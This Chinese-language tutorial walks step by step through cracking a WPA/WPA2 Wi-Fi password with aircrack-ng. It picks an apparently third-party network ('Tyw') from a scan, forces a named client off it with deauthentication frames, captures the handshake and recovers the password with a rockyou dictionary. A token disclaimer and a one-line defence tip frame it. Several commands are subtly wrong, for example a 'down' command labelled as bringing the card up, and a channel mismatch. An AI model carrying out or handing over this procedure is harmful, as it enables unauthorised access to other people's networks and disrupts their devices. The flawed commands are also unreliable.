无线网络安全之暴力破解密码

# 目录
[TOC]
# 无线网络安全之暴力破解密码

需要的工具：aircrack-ng

安装方法：yum insatll aircrack-ng

## 一、**基础工具指令**

### *系统命令*

ifconfig {无线网卡} {up|down}#开关无线网卡

iwconfig {无线网卡} {mode} {monitor}#改为监听模式

Mod下的其他参数

auto：  自动模式

essid：  设置ESSID

nwid：  设置网络ID

freq：  设置无线网络通信频段

chanel： 设置无线网络通信频段

sens：  设置无线网络设备的感知阀值

mode：  设置无线网络设备的通信设备

ap：   强迫无线网卡向给定地址的接入点注册

nick<名字>： 为网卡设定别名

rate<速率>： 设定无线网卡的速率

rts<阀值>： 在传输数据包之前增加一次握手，确信信道在正常的

power： 无线网卡的功率设置

### *无线攻击 --aircrack-ng套件之一：Airmon-NG（无线监听工具）*

airmon-ng --help           #显示帮主文件

airmon-ng             #显示接口状态

airmon-ng check          #检查干扰进程

airmon-ng  {start|stop}  {无线网卡}  #开启或关闭无线监听

### *无线攻击 --aircrack-ng套件之**二**：Aireplay-ng（无线**攻击**工具）*

aireplay-ng 的 6 种攻击模式详解

attack modes (numbers can still be used): //攻击模式(数字仍然可以使用)

--deauth  count : deauthenticate 1 or all stations (-0)  //解除一个或者全部站的连接

--fakeauth   delay : fake authentication with AP (-1)  //对AP进行伪连接攻击

--interactive    : interactive frame selection (-2)  //交互注入攻击

--arpreplay   : standard ARP-request replay (-3)   //标准Arp请求包重放攻击

--chopchop   : decrypt/chopchop WEP packet (-4)  //解码或断续WEP数据包攻击

--fragment      : generates valid keystream (-5)  //产生合法密钥流

aireplay-ng  {-0|-1|-2|-3|-4|-5}             #设置攻击模式

airepay-ng  -0 {次数}  -a {指定ap mac}  -c {指定需要中断的mac} {无线网卡}  #攻击模式-0

### *无线攻击 --aircrack-ng套件之**三**：aircrack-ng*

aircrack-ng -w {字典路径} {数据包}            #跑字典解密

### *无线攻击 --aircrack-ng套件之**四**：**aireplay-ng*

aireplay-ng是aircrack-ng套件里的一款抓包工具，aireplay-ng 中集成了10种攻击方式，分别是：

· Attack 0: Deauthentication [解除认证](https://link.jianshu.com?t=http://www.aircrack-ng.org/doku.php?id=deauthentication)

· Attack 1: Fake authentication [伪造身份验证](https://link.jianshu.com?t=http://www.aircrack-ng.org/doku.php?id=fake_authentication)

· Attack 2: Interactive packet replay [交互式数据包重播](https://link.jianshu.com?t=http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay)

· Attack 3: ARP request replay attack [ARP请求重播攻击](https://link.jianshu.com?t=http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection)

· Attack 4: KoreK chopchop attack [KoreK斩杀攻击](https://link.jianshu.com?t=http://www.aircrack-ng.org/doku.php?id=korek_chopchop)

· Attack 5: Fragmentation attack [碎片攻击](https://link.jianshu.com?t=http://www.aircrack-ng.org/doku.php?id=fragmentation)

· Attack 6: Cafe-latte attack [咖啡拿铁攻击](https://link.jianshu.com?t=http://www.aircrack-ng.org/doku.php?id=cafe-latte)

· Attack 7: Client-oriented fragmentation attack [面向客户的分片攻击](https://link.jianshu.com?t=http://www.aircrack-ng.org/doku.php?id=hirte)

· Attack 8: WPA Migration Mode [WPA迁移模式](https://link.jianshu.com?t=http://www.aircrack-ng.org/doku.php?id=wpa_migration_mode)

· Attack 9: Injection test [注射试验](https://link.jianshu.com?t=http://www.aircrack-ng.org/doku.php?id=injection_test)

Aircrack-ng（注意大小写，aircrack-ng是Aircrack-ng中的一个组件）是一个包含了多款工具的无线攻击审计套装，这里面很多工具在后面的内容中都会用到，具体见下表为Aircrack-ng包含的组件具体列表。

### *airodump-ng**无线抓包软件*

airodump-ng {无线网卡}      #只扫描

airodump-ng  -c {指定信道}  -w {指定文件}  --bssid {指定ap mac地址}  {无线网卡}

### *软件包内其工具以及功能*

[![img](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps11594950568885.jpg)](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps11594950568885.jpg)

## 二、**无线网络暴力破解例子**

### *前提说明*

一下内容全为实验假设，不得用于非法用途

暴力破解思路以及Master Key;Transient Key;EAPOL HMAC；WPA/WPA2四次握手协议解释在参考资料内及上文中有全面的解答，这里不再详细解释。

### 1. *前期准备*

打开终端 执行ifconfig查看网卡

使用iwconfig查看无线网卡

[![img](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps21594950583102.jpg)](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps21594950583102.jpg)

要先将wlan0模式改为监听模式，首先要临时关闭该网卡

sudo ifconfig wlan0 down      #关闭wlan0网卡

sudo iwconfig wlan mode monitor   #改为监听模式

sudo ifconfig wlan0 down      #打开wlan0网卡

[![img](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps31594950594503.jpg)](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps31594950594503.jpg)

光是打开监听模式还不够

还需要在aircrack-ng软件里开启对这张网卡的监听

sudo airmon-ng start wlan0    #设置aircrack-ng监听网卡

同时检测出有两个可能会造成干扰的程序PID为609和694

使用提示内的命令 airmon-ng check kill即可完成清理

[![img](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps41594950607463.jpg)](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps41594950607463.jpg)

[![img](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps51594950614831.jpg)](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps51594950614831.jpg)

### *2扫描阶段*

准备工作完成，现在可以开始扫描了

sudo airodump-ng wlan0    #扫描无线网络

[![img](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps61594950629489.jpg)](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps61594950629489.jpg)

这里分为两大块上面那块是扫描到的ap

下面那块是抓到正在与ap通讯的网络设备

均是以mac地址表示的

其中通过#date的数字我们可以看到那个Tyw通讯的频率很高，有渗透的价值。

[![img](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps71594950656329.jpg)](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps71594950656329.jpg)

目前需要他的bssid（路由器标识mac：B0:95:8E:E6:E5:AF）以及ch（信道：11）

因为扫描是大范围的，airodump-ng会在各个信道内来回扫，不利于我们抓取数据包于是我们需要正对性扫描抓取数据包并保存。

sudo airodump-ng -c 6 -w caozhe/fkwifi/tyw --bssid B0:95:8E:E6:E5:AF wlan0   #-c 信道 -w 抓包生成的文件名 --bssid 路由器的mac地址

[![img](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps81594950667257.jpg)](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps81594950667257.jpg)

抓取中你会看到下图

[![img](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps91594950678901.jpg)](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps91594950678901.jpg)

扫描到有很多客户端正在连接

按照我们的思路需要抓获WPA/WPA2使用4次握手包

这里有两个方法，1，等待AP客户端连。2，强制断开AP客户端使其重新连接

方法一：

不断抓包，知道出现如图提示，表示已经抓取到握手包然后继续，不易察觉。

[![img](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps101594950693475.jpg)](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps101594950693475.jpg)

方法二：

强制断开连接

sudo aireplay-ng -0 10 -a B0:95:8E:E6:E5:AF -c F4:06:16:24:E8:76 wlan0  # -a 路由器mac地址 -c 客户端mac地址

如下图所示

[![img](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps111594950704893.jpg)](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps111594950704893.jpg)

注意-0后面的数字不要太大否则客户端无法重连

### *3破解分析阶段*

抓来的数据包先拖入wireshark分析一下确实捕捉到了刚刚我们断开重连的那台设备的

握手验证数据包

[![img](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps121594950716694.jpg)](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps121594950716694.jpg)

[![img](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps131594950724039.jpg)](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps131594950724039.jpg)

至于数据包内的数据都是加密的，暂时无法人为分析。

确认了数据包内有需要的数据，就可以开始暴力破解了

暴力破解的技术含量不高，

[![img](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps141594950736466.jpg)](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps141594950736466.jpg)

通过社会工程学尽量收集信息，制作使用强大的字典即可。

或kali下自带有一份无线密码字典——> /usr/share/wordlists/rockyou.txt.gz

sudo aircrack-ng -w caozhe/rockyou.txt caozhe/fkwifi/tyw-01.cap

\#caozhe/rockyou.txt字典路径 caozhe/fkwifi/tyw-01.cap刚刚的数据包路径

[![img](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps151594950756388.jpg)](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps151594950756388.jpg)

CPU和GPU在暴力破解的时候会有很大的负荷

解出密码为19901228

[![img](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps161594950795430.jpg)](https://assets.baklib.com/8fbde4a1-8dda-41b8-a3f7-53fe266fba50/wps161594950795430.jpg)

防御方法也很简单，加大密码复杂程度，加大自我网络安全意识

请大家不要而已破坏别人的无线。

攻击的巧妙，监狱进的早！

### *参考资料：*

https://blog.csdn.net/weixin_33814685/article/details/86015159 #关于WPA/WPA2 4次握手

https://www.cnblogs.com/chenyuejun/p/4480481.html     #WiFi 日志记录(四次握手)

https://www.tinymind.net.cn/articles/74b7d88132f713     #WiFi 的四次握手跟破解